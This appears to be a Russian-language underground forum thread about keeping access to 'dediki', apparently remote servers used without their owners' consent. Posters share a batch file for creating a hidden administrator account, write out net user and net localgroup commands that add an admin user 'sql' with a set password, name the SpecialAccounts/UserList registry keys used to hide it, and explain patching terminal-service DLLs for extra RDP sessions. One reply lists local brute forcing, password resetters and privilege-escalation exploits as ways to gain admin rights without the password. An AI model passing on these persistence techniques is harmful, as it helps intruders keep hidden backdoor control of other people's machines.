Защити свои аккаунты качественными и приватными прокси форматов IPv4 и IPv6! - Proxy-seller

Создаем скрытую, учетную запись на дедике

ditrix

МЕСТНЫЙ

подскажите как пропатчить семёрку. это не помогает xRdp.v2.1.exe
на трёх дедах не сработало.

DarkDEVLINE

Проверенный

подскажите как пропатчить семёрку. это не помогает xRdp.v2.1.exe
на трёх дедах не сработало.
Если запуск от имени администратора xRdp.v2.1.exe не помогает можно использовать RDPWrap-v1.6.2, но на семёрках лучше конечно именно патчить терминал, а не эмулировать. Попробуй вручную терминальные dll заменить на уже пропатченные. Точнее надо будет батник написать для автоматизации, т.к. для замены dll нужно остановить службу терминалов, выполнить замену dll и снова запустить службу.
Так же проверь наличие программки Deep Freez, иногда деды попадаются с этой штукой, она блокирует патч dll файлов ну и в принципе вовзвращает исходное состояние компа после перезагрузки.

DarkDEVLINE

Проверенный

can u explain to me how can i take admin with this bat?
The presented BAT file creates a hidden user with administrator rights.
That is, the new user will not be displayed on the login screen among other users.
To create such a user, your initial account must have Administrator rights initially.

If your account has Administrator rights, then run the submitted bat file by adding a new login and password to it. To do this, open it through any text editor and in line number 2 and 3 enter the desired username and password.
For example:
@echo off
SET user = Admin2
SET pass = Pa $$ w0rd
Save the modified bat file and run it as administrator.

tajdin

Проверенный

The presented BAT file creates a hidden user with administrator rights.
That is, the new user will not be displayed on the login screen among other users.
To create such a user, your initial account must have Administrator rights initially.

If your account has Administrator rights, then run the submitted bat file by adding a new login and password to it. To do this, open it through any text editor and in line number 2 and 3 enter the desired username and password.
For example:
@echo off
SET user = Admin2
SET pass = Pa $$ w0rd
Save the modified bat file and run it as administrator.
thank a lot for explain bro

sascha66

Проверенный

Думаю к этой теме не будет лишним вот такое дополнение,надеюсь пригодится.

Команды для деда
Сведения о системе

Администрирование control admintools
Администратор источников данных odbcad32
Восстановление системных файлов sfc /scannow
Диспетчер устройств devmgmt.msc
Групповая политика gpedit.msc
Защита БД учетных записей syskey
Инфраструктура управления wmimgmt.msc
Командная строка cmd
Локальная политика без-ности secpol.msc
Локальные пользователи и группы lusrmgr.msc
Настройка системы msconfig
Назначенные задания control schedtasks
Оболочка Explorer explorer
Общие папки fsmgmt.msc
Панель управления control.exe
Просмотр событий eventvwr.msc
Просмотр установленных программ appwiz.cpl
Подключение к рабочему столу mstsc
Реестр regedit
---------------------------------------------
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\SOFTWARE

Службы services.msc
Сведения о системе msinfo32
Удаление вредоносным программ mrt.exe
Управление компьютером compmgmt.msc
Учетные записи пользователей control userpasswords2
Центр синхронизации mobsync.exe
Windows PowerShell ISE powershell_ise.exe
------------------------------------------------
SpecialAccounts сделать папку или найти
Userlist сделать папку
-------------------------------------------------

Жмем: "start" "run" пишем cmd и вводим:
net user sql 12qQsv5tREj7v /add
net user sql 12qQsv5tREj7v /add
net localgroup Administrators sql /add
===================================================
В данном случае будет создана учетка sql с паролем 12qQsv5tREj7v

например русские дедики: Администраторы
Administrators
испанские Administradores

запускать командную строку из пуска - через правую кнопоку мыши - "run as administrator", после чего все будет работать. Аналогично, возможно, понадобиться запускать ваш софт таким же образом, через правую кнопку мыши.
------------------------------------------------------------------------------------------------------------
Спасибо за нужные команды, помогли.

stanley

Проверенный

Ребят, как можно без прав админа юзверя добавить или повысить права обычного пользователя до админских естественно не зная пароля админа? Пардон за тавтологию...

chelabinsk

ГУРУ

Ребят, как можно без прав админа юзверя добавить или повысить права обычного пользователя до админских естественно не зная пароля админа? Пардон за тавтологию...
Да
гугл nt passworder
Брут локальных учеток
Эксплойты для повышения привилегий (гугл)
Есть и другие варианты, но я ими не пользуюсь, загугли и смотря с чего сидишь ОС

canadich

Проверенный

после создания такой учётки админ права будут у неё для запуска программ на дедике?

Последнее редактирование:

canadich

Проверенный

только что создал учётку на дедике с помощью этого батника и смог подключиться с этой учёткой к дедику но через час уже не могу к нему подключиться меня выкинуло по причине что подключился новый юзер,как такое могло выйти если я подключался через свою учётку,будто при создании своей учётки он мою удалил,что теперь делать кто подскажет и как избегать в дальнейшем таких курьёзов?

zzz78

Модератор

только что создал учётку на дедике с помощью этого батника и смог подключиться с этой учёткой к дедику но через час уже не могу к нему подключиться меня выкинуло по причине что подключился новый юзер,как такое могло выйти если я подключался через свою учётку,будто при создании своей учётки он мою удалил,что теперь делать кто подскажет и как избегать в дальнейшем таких курьёзов?
Какая ОС? Возможно там не серверная ОС, например WIN10, там ограничение на одного пользователя онлайн

Сверху Снизу